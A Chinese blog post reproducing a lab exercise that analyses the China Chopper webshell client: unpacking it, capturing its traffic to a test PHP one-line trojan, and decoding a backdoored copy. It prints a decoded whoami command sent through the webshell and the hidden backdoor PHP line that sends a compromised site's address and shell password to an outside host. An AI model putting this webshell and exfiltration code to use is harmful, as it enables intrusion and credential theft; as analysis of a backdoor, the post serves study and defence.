水豚漫游

全面分析中国菜刀及隐藏后门实验

 我学我学  379  1 分钟

本文内容来自蚁景网安实验室:全面分析中国菜刀及隐藏后门

实验步骤一 静态分析

通过WinHex和PEiD可以看出它已加壳。

image-20220123100737146

image-20220123100956464

脱壳处理:

image-20220123101520697

再用PEiD查看,已经成功脱壳。

image-20220123101804367

使用strings工具查找关键字符串

image-20220123102129040

image-20220123102259413

实验步骤二 动态分析

利用PhpStudy搭建网站,编写一句话木马。

image-20220123102659075

利用菜刀连接,并用WireShark抓包。

image-20220123104528653

image-20220123104601503

image-20220123104632417

由于z0, z1, z2三个参数被加密,可以用Burp解码。

经过url及Base64解码得到

image-20220123111720404

z1的值为cmd,z2的值为cd /d "C:\phpstudy\PHPTutorial\WWW"&whoami&echo [S]&cd&echo [E]

意为执行输入的cmd命令,列出当前用户与当前目录。

实验步骤三 分析中国菜刀后门

使用另一个有后门的菜刀,并使用Winsock Expert分析。

image-20220123112346393

经过URL和Base64解码后仍存在密文,再用Base64解码一次,得到z0中的内容。

image-20220123113156992

得到菜刀后门地址。

1

if($_COOKIE['Lyke']!=1){setcookie('Lyke',1);@file('http://www.7jyewu.cn/hack.php?Url='.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'].'&Pass='.key($_POST));}

这表示该菜刀会将我们拿到shell的网站、地址、密码等都通过后门传送给这个网站的所有者。

相关文章: